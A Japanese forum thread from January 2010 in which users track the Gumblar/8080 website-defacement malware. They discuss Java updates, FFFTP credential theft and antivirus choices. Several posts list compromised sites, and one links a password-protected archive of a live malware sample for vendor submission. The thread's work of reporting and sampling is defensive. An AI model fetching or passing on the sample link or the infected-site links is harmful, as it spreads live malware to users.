ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter02/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter05/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter08/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/summer/chapter03/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter01/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter06/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter04/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter02/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter05/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter08/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter03/index●html
ttp://www●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter07/index●html
0108名無しさん@お腹いっぱい。
2010/01/29(金) 21:33:23Avast と MSのやつ だと どっちがいいですか?
0109名無しさん@お腹いっぱい。
2010/01/29(金) 21:37:01たぶんavast、ただしまだv4の方がトラブルが少なく安定だと思う
MSEにはWeb監視機能が無い→発見したときは(実害は無くとも)すでに侵入されてる可能性
0110名無しさん@お腹いっぱい。
2010/01/29(金) 21:41:13「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
http://www.so-net.ne.jp/security/news/newstopics_201001.html
※よくわかってない人は必読
サイト改ざん止まず(1) 修復サイト再汚染が多発、PW変更/感染チェックを
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2138
サイト改ざん止まず(2) 改ざんサイト告知一覧(2010年1月14日〜1月28日)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2139
DEBUG→.ru:XXXXには触れてないが、相変わらず早いなw
0111名無しさん@お腹いっぱい。
2010/01/29(金) 21:53:130112名無しさん@お腹いっぱい。
2010/01/29(金) 21:56:09so-netの所では
企業のサイトは(認めてる所は)公表するけど
個人のサイトは難しいのでは?
ここに晒すのもちょっとはばかれるけど、もし見つけたらどうしたものか・・・
0113名無しさん@お腹いっぱい。
2010/01/29(金) 21:57:200114名無しさん@お腹いっぱい。
2010/01/29(金) 21:58:17>>7をやって、今後も最新版がリリースされたら、すぐに最新版を
インストールするようにしてれば、どっちでもいいよ
0115名無しさん@お腹いっぱい。
2010/01/29(金) 21:59:05それ以前に対策をしっかりしましょう
0116名無しさん@お腹いっぱい。
2010/01/29(金) 21:59:590117へたれ発掘屋
2010/01/29(金) 22:03:12そーゆー貼りかたやめれ。
1コ上の階層を調べてみませう。
あと、コードのタイプを書いておくと
最新型が大好物の検体提出屋さんが拾いやすくなる(はず)だから
可能ならタイプ(CODE1とかDEBUGとか)を書いてくれ。
>>99
勝手に命名してスマソ(仮名って書くの忘れた)
で、名無し最新型の呼び名はどうするよ?
0118名無しさん@お腹いっぱい。
2010/01/29(金) 22:11:50so-netの無印で良くね
0119名無しさん@お腹いっぱい。
2010/01/29(金) 22:21:44ありがとうございます、avaでいきます
>>114,115
そうですね、>>7チェックします
0120名無しさん@お腹いっぱい。
2010/01/29(金) 22:33:36どっちもやめとけ
無料では歯がたたん(笑)
0121名無しさん@お腹いっぱい。
2010/01/29(金) 22:39:270122名無しさん@お腹いっぱい。
2010/01/29(金) 22:42:330123名無しさん@お腹いっぱい。
2010/01/29(金) 22:43:190124名無しさん@お腹いっぱい。
2010/01/29(金) 22:44:020125名無しさん@お腹いっぱい。
2010/01/29(金) 22:49:310127名無しさん@お腹いっぱい。
2010/01/29(金) 23:17:21真面目に使えばめちゃめちゃ儲けられるんじゃないのか。
0128名無しさん@お腹いっぱい。
2010/01/29(金) 23:20:220129名無しさん@お腹いっぱい。
2010/01/29(金) 23:31:23まあマルウェア作成者の逮捕なんてされる方が珍しいだろうけど
0131名無しさん@お腹いっぱい。
2010/01/29(金) 23:52:570132名無しさん@お腹いっぱい。
2010/01/30(土) 00:09:35ttp://www●ssvc●ne●jp/index●html (ru:X=DEBUG改)
未通報
0133名無しさん@お腹いっぱい。
2010/01/30(土) 00:13:41ここの3.に書かれてるNEC製パソコンは古いJavaが見えないってホント?
0134名無しさん@お腹いっぱい。
2010/01/30(土) 00:14:11きりがないなぁ
0135名無しさん@お腹いっぱい。
2010/01/30(土) 00:43:09マジ
しかもアンインスコできない(最新版消すと古いのに書き戻される)
0136名無しさん@お腹いっぱい。
2010/01/30(土) 00:46:350137名無しさん@お腹いっぱい。
2010/01/30(土) 00:48:310138名無しさん@お腹いっぱい。
2010/01/30(土) 00:50:100139名無しさん@お腹いっぱい。
2010/01/30(土) 00:55:44!?
家族のノートPCはNECなんだが…
一応対策しとけと言っといたが駄目…なのかい
0141名無しさん@お腹いっぱい。
2010/01/30(土) 01:09:01新しいJAVAいれとけば大丈夫
0142名無しさん@お腹いっぱい。
2010/01/30(土) 01:13:05コンパネいじる・JavaRa等の削除ツールを使うetc
いろいろ手はあるが確実性に欠けたり自己責任なんだよなあ
0143名無しさん@お腹いっぱい。
2010/01/30(土) 01:18:51残るなら、あらかじめ仕込があるってことだから、神経質なひとは削除ツール使うしかない
0144名無しさん@お腹いっぱい。
2010/01/30(土) 01:21:53とりあえず最新版入れれば、古いバージョンを決め打ちされない限り大丈夫のはず
出来れば決め打ちに備えて、古いバージョンは一掃したいけど…
0145139
2010/01/30(土) 01:23:32細かいこと言ってもわからんだろうし俺がなんとかやるか…
0146142
2010/01/30(土) 01:31:33ごめん、言葉が足りなかったorz
消しても窓のコンパネにはがっつり残るんだよ>NEC
Java最新版のコンパネってか設定にバージョン管理する項目があるから
そこで古いバージョンのチェックを外せば回避できるかな?って思ったんだ
ROMに戻る、スマンカッタ
0147名無しさん@お腹いっぱい。
2010/01/30(土) 02:05:31昔NとかFとかのメーカー、購入したときの情報が.txtで残っていて
JAVAとJavaスクリプトの組み合わせで読み取れて個人情報抜かれるなんて都市伝説あったなぁ。
スレチすまん。もう寝る。
0148名無しさん@お腹いっぱい。
2010/01/30(土) 02:09:430149名無しさん@お腹いっぱい。
2010/01/30(土) 02:13:250150名無しさん@お腹いっぱい。
2010/01/30(土) 02:26:23本当に1.5じゃないと動かないシステムを組んでいるところは、これ以上の新たな脆弱性が
発見されたときはどうするんだろうか。
0151名無しさん@お腹いっぱい。
2010/01/30(土) 02:35:54サーバからローカルにファイルをすべてコピーして
スクリプトの部分を一括置換で消そうとしたのですが
ファイルが開きません。
これは新種の亜種でしょうか。
通常のダブクリでもアプリからでも開けません。
今はhogehoge.htmlをhogehoge.txtにリネームして開いてます。
(この方法なら開けるんです)
ただファイル数が5000をこすので一括置換したいんです。
開く方法をご存知の方いらっしゃいましたら教えてください。
よろしくお願いしますorz
0152名無しさん@お腹いっぱい。
2010/01/30(土) 02:43:03アップロードする前のファイルはどこへいったの?
オリジナルファイルがないってありえなくね?
0153名無しさん@お腹いっぱい。
2010/01/30(土) 02:44:16単に関連付けが変わっただけとかじゃなかろうか
エスパー先生おねがいします
0154名無しさん@お腹いっぱい。
2010/01/30(土) 02:46:00ありがとうございます。
静的ページはオリジナルがあるのですが
CMSで生成されたページはサーバにしか残ってないんですorz
0155名無しさん@お腹いっぱい。
2010/01/30(土) 02:52:35例えばメモ帳にドラッグ&ドロップすると「アクセスが拒否されました」とアラートが表示されます。
ドリウィで開こうとすると
「C;\Documents and ・・・・hogehoge.html へのアクセスは拒否されました」と表示されます。
0156名無しさん@お腹いっぱい。
2010/01/30(土) 03:27:290157名無しさん@お腹いっぱい。
2010/01/30(土) 03:32:57置換機能のあるテキストエディタ使えばいいんじゃなかろうか
0158名無しさん@お腹いっぱい。
2010/01/30(土) 03:38:320159名無しさん@お腹いっぱい。
2010/01/30(土) 03:40:580160名無しさん@お腹いっぱい。
2010/01/30(土) 03:43:020161名無しさん@お腹いっぱい。
2010/01/30(土) 03:43:050162名無しさん@お腹いっぱい。
2010/01/30(土) 03:47:160163名無しさん@お腹いっぱい。
2010/01/30(土) 03:49:11rename *.html *.txt
<<<
でbatを作ってリネームしたんですがbatファイルのあるフォルダにしか適用される下の階層のhtmlファイルなどの拡張子がそのままなんですorz
0164名無しさん@お腹いっぱい。
2010/01/30(土) 03:51:34同感
0165名無しさん@お腹いっぱい。
2010/01/30(土) 03:52:030166名無しさん@お腹いっぱい。
2010/01/30(土) 03:53:41もうブラウザの方でJAVAの実行を切っておくしかなさそうだな。
で、どうしても必要な時だけ手動でONにする、と。
0167名無しさん@お腹いっぱい。
2010/01/30(土) 03:55:460168名無しさん@お腹いっぱい。
2010/01/30(土) 03:56:460169名無しさん@お腹いっぱい。
2010/01/30(土) 03:56:570170名無しさん@お腹いっぱい。
2010/01/30(土) 03:57:450171名無しさん@お腹いっぱい。
2010/01/30(土) 04:00:180172名無しさん@お腹いっぱい。
2010/01/30(土) 04:06:29マルウェアのロシア発のマルウェアの割合は27.9%。これに対して中国の割合は26.5%。
過去の調査では世界2位になってしまった米国は今回、3位(10%弱)となった。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PC Toolsは、マルウェアをばらまく犯罪者集団Russian Business Networkが消滅した
にも関わらず、ロシアの生産量が落ちていないことを指摘している。
PC ToolsのマルウェアアナリストSergei Shevchenko氏は声明で「Russian Business Network
がいなくなったところに、ほかのマルウェアディストリビュータが入り込んでいる」と述べる。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
「結果として、過去にないくらい多くのウイルスやスパイウェアがロシアから出てきている。
そして、マルウェアの複雑さが増している」(Shevchenko氏)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
さらに、今はなきRussian Business Networkのほうが、その代わりに出てきた小規模な組織
よりも追跡しやすかったとShevchenko氏は言う。「現在は、ロシアのマルウェアホスティング
サービスが、マレーシアや中国、パナマ、シンガポール、タイ、トルコ、インドのサーバに目を
向けている」
http://japan.zdnet.com/news/sec/story/0,2000056194,20367817,00.htm
0173名無しさん@お腹いっぱい。
2010/01/30(土) 04:14:050174名無しさん@お腹いっぱい。
2010/01/30(土) 04:41:57ttp://csbbs.ninja.co.jp/Thread_View/40700/
新パターンらしい
0175名無しさん@お腹いっぱい。
2010/01/30(土) 04:45:090176名無しさん@お腹いっぱい。
2010/01/30(土) 05:23:230177名無しさん@お腹いっぱい。
2010/01/30(土) 06:08:20ttp://labs-uploader.sabaitiba.com/virus/download/1264799189.rar
PASS:virus
もう嫌だこのウイルス・・・(´・ω・`)
0178名無しさん@お腹いっぱい。
2010/01/30(土) 06:29:42古いver残ってたけど、Java6 Update12あたり?(うろ覚えだけど)
から一応「上書き」されて古いのは消えるようになってますよね。
Firefoxだと古いのは残って消す必要あるし、プラグイン怖い
WhiteListとか意味ねええええ
0179名無しさん@お腹いっぱい。
2010/01/30(土) 07:14:47邪魔なんだよなって思ってたんだけどw
0180名無しさん@お腹いっぱい。
2010/01/30(土) 07:24:14いつもありがとう、ご苦労様ですm(__)m
0181名無しさん@お腹いっぱい。
2010/01/30(土) 07:56:26解凍後 tar.gz にてM$,ClamAvに送付。
0182名無しさん@お腹いっぱい。
2010/01/30(土) 08:01:07とりあえず>>2にあるjavaのバージョンチェックして、そこで出てきた最新版を
インストールしたんだけどこれで大丈夫なのかな? 情弱で申し訳ない。
0183182
2010/01/30(土) 08:06:120184名無しさん@お腹いっぱい。
2010/01/30(土) 08:20:400185名無しさん@お腹いっぱい。
2010/01/30(土) 08:58:02Secunia Personal Software Inspector (PSI) 1.5.0.1で
インストール済みのアプリが最新かどうか古いバージョンがあるかチェックするといいよ
ttp://secunia.com/vulnerability_scanning/personal/
0186名無しさん@お腹いっぱい。
2010/01/30(土) 10:11:300187名無しさん@お腹いっぱい。
2010/01/30(土) 10:35:49ニフティの方は使えたよ。(@niftyウイルスチェックサービス/中身はかすぺる)
本家がメンテしてるってことは新しいやつに対応してないのかもしらんが。
0188名無しさん@お腹いっぱい。
2010/01/30(土) 10:40:24http://www.atmarkit.co.jp/fwin2k/win2ktips/994uninstjre/uninstjre.html
2008/03/07
■ Java Runtime Environmentをアップデートすると、新しいバージョンが新規にインストールされる。
■ Java Runtime Environmentの容量はバージョンによっても異なるが、70Mbytes以上もある。
■ 古いバージョンのJava Runtime Environmentをアンインストールすれば、ハーディスクの空き容量を増やすことができる。
0189名無しさん@お腹いっぱい。
2010/01/30(土) 11:26:03あれ、こないだやったらエラーで使えなかったぜnifty
0190名無しさん@お腹いっぱい。
2010/01/30(土) 11:40:42ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html
0191名無しさん@お腹いっぱい。
2010/01/30(土) 11:41:180192名無しさん@お腹いっぱい。
2010/01/30(土) 11:49:06それ、ある意味凄いな
知名度があるってことか・・・
可能性
・単に知名度があったから
・犯人は日本に詳しい
・犯人は日本人
0193名無しさん@お腹いっぱい。
2010/01/30(土) 11:50:27まじかよ。。
0194名無しさん@お腹いっぱい。
2010/01/30(土) 11:51:29リストのうち,最後の三箇所
ttp://www●hakuchi●jp/bodypaint/
ttp://www●hakuchi●jp/57577/
ttp://www●hakuchi●jp/OTSUYA/
0195名無しさん@お腹いっぱい。
2010/01/30(土) 11:53:430196名無しさん@お腹いっぱい。
2010/01/30(土) 12:04:34それ普通に使ってて、年末にJRE未更新状態で感染サイト踏まされたが
自サイト改ざんは未だなくスキャンでも何も出てこない
何故俺は助かったんだ…
0197名無しさん@お腹いっぱい。
2010/01/30(土) 12:23:44えっち
0198名無しさん@お腹いっぱい。
2010/01/30(土) 12:32:04まぁよく使われるFTP蔵なんてそんな数あるわけでもないんで
有名どころは網羅されてるんでねーの。
FileZilla、WinSCP、FTPExplorer、etc.
0199名無しさん@お腹いっぱい。
2010/01/30(土) 12:44:48だからFFFTPだけに限った話では無いわけで。
FFFTPだけだったら海外サイトまでなぜ感染するんだろうなあ、とか思ったり。
0200名無しさん@お腹いっぱい。
2010/01/30(土) 12:46:450201名無しさん@お腹いっぱい。
2010/01/30(土) 12:50:27どうもありがとうございます。
ちなみにjavaの更新方法は間違ってないよね。確か6 Update 18ってのに更新したはずだけど…
0202名無しさん@お腹いっぱい。
2010/01/30(土) 12:57:07いやFFFTPを起動していないのにサイトやられちゃったという話が出た
(FFFTPはレジストリかiniに保存する)ので驚いているわけで。
世界でおそらく最も使われているのはFileZillaで、これは前から
malwareにしょっちゅう抜かれてるんだけどね。
0203名無しさん@お腹いっぱい。
2010/01/30(土) 13:02:21感染したPCの中を覗ける
0204名無しさん@お腹いっぱい。
2010/01/30(土) 13:08:55なるほど、そういうことね。
ありがとう
0205名無しさん@お腹いっぱい。
2010/01/30(土) 13:26:01マジでこえーよ
0206名無しさん@お腹いっぱい。
2010/01/30(土) 13:34:22コンパネに残らないな
残る人の機種は何年前?
0207名無しさん@お腹いっぱい。
2010/01/30(土) 13:50:54ハチゼロハチゼロ
ハチマルハチマル
パオパオ
0208名無しさん@お腹いっぱい。
2010/01/30(土) 14:50:49で読んでるけど
0209名無しさん@お腹いっぱい。
2010/01/30(土) 14:53:17何度か繰り返しやってたらできたよ
0210名無しさん@お腹いっぱい。
2010/01/30(土) 14:56:51通常のネット閲覧ではあんまり使わないから余計な物は入れない方が良いと思う。
0211名無しさん@お腹いっぱい。
2010/01/30(土) 15:07:061月30日14時41分配信 読売新聞
http://headlines.yahoo.co.jp/hl?a=20100130-00000527-yom-soci
>新タイプでは、従来型と違い、クレジットカード番号を盗む仕組みが加わるなど、犯罪の意図が明確になってきているという。
これってネタ? マジ?
0212名無しさん@お腹いっぱい。
2010/01/30(土) 15:26:51Security Toolのことだろうからマジと言えばマジ
今は英語版しかないみたいだけど、日本語版でも出れば騙される人激増するだろうね
ここからは妄想だが、引っ張ってくるマルウェアにキーロガーが加わってくれば、Security Toolのようなフィッシングに近い形の盗み方と違って
PCで番号打っただけで盗むことは可能よね
0213名無しさん@お腹いっぱい。
2010/01/30(土) 15:38:13って書いてあった・・・ガンブラー本体じゃねえじゃん・・・
何だこの如何様記事
0214名無しさん@お腹いっぱい。
2010/01/30(土) 15:41:210215名無しさん@お腹いっぱい。
2010/01/30(土) 15:42:33社員おつ
0216名無しさん@お腹いっぱい。
2010/01/30(土) 15:44:35ここが間違ってるような気がする。Security Toolって誘導というより8080系に感染したら自動的に引っ張ってきて強制インスコだったような・・・
それともこの記事はSecurity Toolとは別のこと言ってるんだろうか?
0217名無しさん@お腹いっぱい。
2010/01/30(土) 15:46:45ミクシのアプリとか
0218名無しさん@お腹いっぱい。
2010/01/30(土) 15:46:500219名無しさん@お腹いっぱい。
2010/01/30(土) 15:59:19後半が昨年秋の古い講演会資料の転載になってるから生じている問題なんだが、
普通のお花畑公務員は、それが最新の情報と勘違いするぞ。
多分センター自体がGENOと8080の違いについてわかってないんだろう。
文頭に別種と書いてはいるが、どう別種なのかわからないままの資料丸写しに見える。
大体、検知システムは来月から試行って段階だしな。
無料だが。
0220名無しさん@お腹いっぱい。
2010/01/30(土) 16:06:10スレの最初から読む気が無い奴にはこのリンク出しときゃだいたい分かるだろ。まあそんな奴は長文読む気がない奴も多いのが問題だが・・・
「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html
0221名無しさん@お腹いっぱい。
2010/01/30(土) 16:13:13Sota's Web Page
"FFFTPをお使いの方に重要なお知らせ"
ttp://www2.biglobe.ne.jp/~sota/index.html
0222名無しさん@お腹いっぱい。
2010/01/30(土) 16:17:17当然 自分らで確認も理解もしてません。
0223名無しさん@お腹いっぱい。
2010/01/30(土) 16:17:460224名無しさん@お腹いっぱい。
2010/01/30(土) 16:22:23XPでソフトウェアの追加と削除から削除したら
>>221にある消去すべきとこ
HKEY_USERS\ユーザー識別番号\Software\Sota\FFFTP\Options \Host(n) : nは数字
が
HKEY_USERS\固有の番号\Software\Sota
までで以下ないけどこれでいいのかな
0225名無しさん@お腹いっぱい。
2010/01/30(土) 16:33:130226名無しさん@お腹いっぱい。
2010/01/30(土) 16:34:58おまえがそう思うのならばそうなんだろう(AA略
0227名無しさん@お腹いっぱい。
2010/01/30(土) 16:35:440228名無しさん@お腹いっぱい。
2010/01/30(土) 16:37:44すまん>>2にあるやつ
0229名無しさん@お腹いっぱい。
2010/01/30(土) 16:37:57フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性
http://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html
Thanks and Farewell FFFTP
http://www3.atword.jp/gnome/2010/01/28/hammmer-and-anvil-a-blacksmith-in-the-dark/
設定はiniに格納すればおk?
138 名前:名無しさん@お腹いっぱい。[] 投稿日:2010/01/30(土) 15:09:40 ID:IQxi/7CR0
>>136
うん、iniに保存で大丈夫。
レジストリ狙ったマルウェアが出てるだけだから。
アンインストール(笑)
139 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/30(土) 15:22:07 ID:D0RKI4Os0
ウチのレジストリには、>>136のリンク先で示されてる項目が
ないんだけど、そーいうもん?
140 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/30(土) 15:31:26 ID:TnywA9GR0
>>138
ありがとー
自分はDドラにインスコして
CドラのOSは数回再インストールしてるから、
レジストリには何にもないよ>>139
。
なんだまだまだ使えるんじゃん、それをfarewellてwwwww
大丈夫かこいつら
0230名無しさん@お腹いっぱい。
2010/01/30(土) 16:41:19FFFTPと心中するんだろう
0231名無しさん@お腹いっぱい。
2010/01/30(土) 16:45:26心中したいならば、別にそれでかまわんよ、
このウィルスに感染しても個人サイトなら個人の問題だからね。
金かせぐ仕事でFFFTP使ってるなら、やめとけといっとく
0232名無しさん@お腹いっぱい。
2010/01/30(土) 16:47:450233名無しさん@お腹いっぱい。
2010/01/30(土) 16:48:55あとは何が起こっても完全に使う奴の自己責任だわ。
0234名無しさん@お腹いっぱい。
2010/01/30(土) 16:49:03その対策を全部やってれば"今のところ"感染はしないのでFFFTP使ってても問題なし。"今のところ"はね
後、以前に一回感染してたんならパス変えなきゃ意味無い
でも、今回のに関係なくクライアント変更したりSSLなFTPとか別のプロトコルに変えたりIPでアクセス制限かけたりした方が無難だよね
鯖側が対応出来てれば、の話だけど
FTPのID/Pass盗み取るマルウェアは8080系だけじゃないんだから
まあFFFTPの作者さんのこういうアナウンスをするっていう決断は素晴らしいと思う
0235名無しさん@お腹いっぱい。
2010/01/30(土) 16:58:16FFFTPのレジストリ見たけどhistory01〜04の項目もあって
IDPW入力した履歴が残ってるかも?
0236名無しさん@お腹いっぱい。
2010/01/30(土) 16:58:310237名無しさん@お腹いっぱい。
2010/01/30(土) 17:01:500238名無しさん@お腹いっぱい。
2010/01/30(土) 17:06:390239名無しさん@お腹いっぱい。
2010/01/30(土) 17:12:19FFFTPと同じ危険性がある…っていうかもう既にFileZillaから盗み取るやつあるんじゃなかったっけ…?
0240名無しさん@お腹いっぱい。
2010/01/30(土) 17:14:45履歴にもIDPWが残るタイプだと危険かね
0241名無しさん@お腹いっぱい。
2010/01/30(土) 17:14:47初期設定だとINIファイルに保存設定になってるのですか?
それだと安心なのですが。インストールしたフォルダもなくなってて
確認のしようがないのですが。。。
0242名無しさん@お腹いっぱい。
2010/01/30(土) 17:15:34つーか他にffftp相当の使いやすさで、SFTP対応で、日本語メニューで、アカウント情報が盗まれにくくて
というのが全て揃ったftpソフトって何があるかね?
0243名無しさん@お腹いっぱい。
2010/01/30(土) 17:17:58初期設定はレジストリ
アンインスコをプログラムの追加と削除から行ったのなら、レジストリも恐らく消えてる。
レジストリから情報盗んでるとすると、完全に日本狙い撃ちされてるってことになるな。
0244名無しさん@お腹いっぱい。
2010/01/30(土) 17:18:13ないものはつくるしかないと聞く
0245名無しさん@お腹いっぱい。
2010/01/30(土) 17:19:01ありがとうございます、安心しました。
0246名無しさん@お腹いっぱい。
2010/01/30(土) 17:20:04格好の狩場として標的にされてる節がある
貧乏人はインターネットするな時代になりつつあるような
0247名無しさん@お腹いっぱい。
2010/01/30(土) 17:21:34むかつくくらいだ
0248名無しさん@お腹いっぱい。
2010/01/30(土) 17:24:520249名無しさん@お腹いっぱい。
2010/01/30(土) 17:25:30それだけ稼げてるんだろな
0250名無しさん@お腹いっぱい。
2010/01/30(土) 17:26:00ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html
> 「UnderForge of Lack」では、消去すべきレジストリを記載してありますので、『FFFTP』のユーザーさんは、参考にして下さい。
ttp://www3.atword.jp/gnome/2010/01/28/hammmer-and-anvil-a-blacksmith-in-the-dark/
> 代わりのFTPソフトとしては、『ALFTP』、『WinSCP』、有料ですが『NextFTP』(3ヶ月間の無料試用期間あり)などをどうぞ。
0251名無しさん@お腹いっぱい。
2010/01/30(土) 17:29:310252名無しさん@お腹いっぱい。
2010/01/30(土) 17:34:07作者も恐らく別人だろうし
0253名無しさん@お腹いっぱい。
2010/01/30(土) 17:36:43http://kasim.kashima136.com/z19z00703/?link/news/ffftp.html
この辺も読んどいた方がいいかも。
0254名無しさん@お腹いっぱい。
2010/01/30(土) 17:39:39お前最悪だな
おまえ等踏むなよ
0255名無しさん@お腹いっぱい。
2010/01/30(土) 17:40:58危険
飛んだらダメ
FFFTPとは全く関係ない、8080系に感染済みサイト
念のためにスクリプト切っといて良かったw
0256名無しさん@お腹いっぱい。
2010/01/30(土) 17:43:480257名無しさん@お腹いっぱい。
2010/01/30(土) 17:46:10俺今出先で携帯なんで無理
これは悪質だ
0258名無しさん@お腹いっぱい。
2010/01/30(土) 18:07:41まず問題ないんでないの
それか通常ブラウザでもスクリプト類offにしとくとか
0259名無しさん@お腹いっぱい。
2010/01/30(土) 18:08:31ひどいスパムサイトだな
0260名無しさん@お腹いっぱい。
2010/01/30(土) 18:13:100261へたれ発掘屋
2010/01/30(土) 18:16:18皆様如何お過ごしでせうか?
とりあえず最新型っぽいのを1件投下
「BAL BAL NET」
tp://www●balbal●net/
※サイト内全滅の予感
つーほー&検体提出ヨロ
0262名無しさん@お腹いっぱい。
2010/01/30(土) 18:23:59< ・、,,,;;,) ハ,,..,,ハ
< つ=つ /;;・ω・;;ヽ
ノ ノ三) (;( ^^^ );)
∠、 m)=m).. `'ー---‐´
ガンブラー トトロイ
(2009 〜 ) (2010 〜 )
0263名無しさん@お腹いっぱい。
2010/01/30(土) 18:29:49開発続けて欲しいわ。
0264名無しさん@お腹いっぱい。
2010/01/30(土) 18:30:37二段目のスクリプトの中身がNothingになっていた件ww
FTPクライアントはFireFTP使ってる
0266名無しさん@お腹いっぱい。
2010/01/30(土) 18:43:01おつ!
シマンテックに提出しました。
とりあえずVirSCANの結果
http://www.virscan.org/report/7626fd91e4baba2333ade30e0eeed687.html
0267名無しさん@お腹いっぱい。
2010/01/30(土) 18:46:250268名無しさん@お腹いっぱい。
2010/01/30(土) 18:52:50http://tsushima.2ch.net/test/read.cgi/news/1264841726/
0269名無しさん@お腹いっぱい。
2010/01/30(土) 18:54:290270名無しさん@お腹いっぱい。
2010/01/30(土) 18:59:270271名無しさん@お腹いっぱい。
2010/01/30(土) 18:59:53有名ソフトほど狙われやすい
マイナーソフト使えば使うほど狙われにくい
FFFTPがいちばん日本で普及してるから狙われたんじゃね?
おれはSFTP使えるWinSCPメインだけど
0272名無しさん@お腹いっぱい。
2010/01/30(土) 19:00:040273名無しさん@お腹いっぱい。
2010/01/30(土) 19:01:50一般的なソフトのパスワード保存って、
もしくは簡単な独自アルゴリズムで暗号化・複合してる、
もしくはソフト本体側に埋め込まれた共通鍵だけだからデバッガ使って解析されたらばれる
暗号化っていうよりエンコードに近い
0274名無しさん@お腹いっぱい。
2010/01/30(土) 19:04:100275名無しさん@お腹いっぱい。
2010/01/30(土) 19:15:30一昨年
0276名無しさん@お腹いっぱい。
2010/01/30(土) 19:18:57McAfee送信完了
0277名無しさん@お腹いっぱい。
2010/01/30(土) 19:29:18avastにチェストから送信しました
0278名無しさん@お腹いっぱい。
2010/01/30(土) 19:30:43オープンソースだから誰にでも分かる
0279名無しさん@お腹いっぱい。
2010/01/30(土) 19:32:480280名無しさん@お腹いっぱい。
2010/01/30(土) 19:35:18そのうちやられるんじゃないか?
0281名無しさん@お腹いっぱい。
2010/01/30(土) 19:51:03パスワードデータベースをパスワードで保護するとかしないといかんな
0282名無しさん@お腹いっぱい。
2010/01/30(土) 20:02:020283名無しさん@お腹いっぱい。
2010/01/30(土) 20:03:52そうみたい
パスワードを保存するのが危険だって
感染実験してみた人が書いてた
FFFTP以外にもメジャーどころは情報盗まれたみたいだよ
0284名無しさん@お腹いっぱい。
2010/01/30(土) 20:08:42しかし毎回パスワード打つようにしてもキーロガー仕込まれてたら
意味無いのですよね
0285名無しさん@お腹いっぱい。
2010/01/30(土) 20:10:130286名無しさん@お腹いっぱい。
2010/01/30(土) 20:17:310287名無しさん@お腹いっぱい。
2010/01/30(土) 20:20:35・・・けど秘密鍵まで持ってかれたらアウトだよな
0288へたれ発掘屋
2010/01/30(土) 20:22:40tp://horizon●f00●jp/
SELECT ROOM(GNU GPL)
tp://selectroom●net/2007/10
最新型が釣れないよ・・・ orz
0289名無しさん@お腹いっぱい。
2010/01/30(土) 20:27:07<script>タグをコメントアウトしてるのは何でだろう?
管理者のとりあえずの処置?
それとももともと?
0290名無しさん@お腹いっぱい。
2010/01/30(土) 20:37:200291名無しさん@お腹いっぱい。
2010/01/30(土) 21:42:49パケそのものを盗ってるわけじゃないんでそ?
だったら、短文登録しておいて、たとえば「パ」→「pass」みたいに
変換して使えばバレなくない?
あとは、1文字おきに打って、マウスでカーソル動かして残りを
埋めるような形でパス打つとか。
上の例だと「ps」→「pas」→「pass」
0293名無しさん@お腹いっぱい。
2010/01/30(土) 21:45:380294名無しさん@お腹いっぱい。
2010/01/30(土) 22:17:38://kasim●kashima136●com/z19z00703/?link/news/ffftp●html
0295名無しさん@お腹いっぱい。
2010/01/30(土) 22:26:39http://pc11.2ch.net/test/read.cgi/sec/1263865118/253-
0296名無しさん@お腹いっぱい。
2010/01/30(土) 22:26:46そこの中古車屋は修復してまた改竄なの?それとも放置なの?
0297名無しさん@お腹いっぱい。
2010/01/30(土) 22:27:010298名無しさん@お腹いっぱい。
2010/01/30(土) 22:45:52CMSを使っている俺に隙はなかった
みんな無理せずに出来の悪いOS投げ捨ててこっちにおいでよ
PDF閲覧ソフト・Flash再生ソフト・Java?なにそれおいしいの?
プロプライエタリの塊なんぞ最初からノーサンキューです
0299名無しさん@お腹いっぱい。
2010/01/30(土) 22:46:510301名無しさん@お腹いっぱい。
2010/01/30(土) 23:01:46>>297
すまん。
リンクあぼーんしてたんで見えてなかった。
0302名無しさん@お腹いっぱい。
2010/01/30(土) 23:04:13個人でトークンって使えるものなの?
030345
2010/01/30(土) 23:08:27かすぺ
> Hello,
>
> index.htm_, index2.htm_, profile_index.htm_ - Trojan.JS.Redirector.at
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> The answer is relevant to the latest bases from update sources.
>
> Please quote all when answering.
> -----------------
> Regards, Baranov Artiom
> Virus Analyst, Kaspersky Lab.
0305へたれ発掘屋
2010/01/30(土) 23:23:15朝日オートの件だが
改竄→無効化(コメントアウト)→再改竄・・・
というループを繰り返してる。
※最新型と1コ前の型の違いは「eval」の有無
0307名無しさん@お腹いっぱい。
2010/01/31(日) 01:22:03・Gumblar Checker 2
ttp://gumblarchecker.crz.jp/
が白紙になってるけど。死亡?
0308名無しさん@お腹いっぱい。
2010/01/31(日) 01:25:151時間くらい前から、白紙になってるね。
0309名無しさん@お腹いっぱい。
2010/01/31(日) 02:07:16ttp://www●amsf●or●jp/index●html
砂川商工会議所
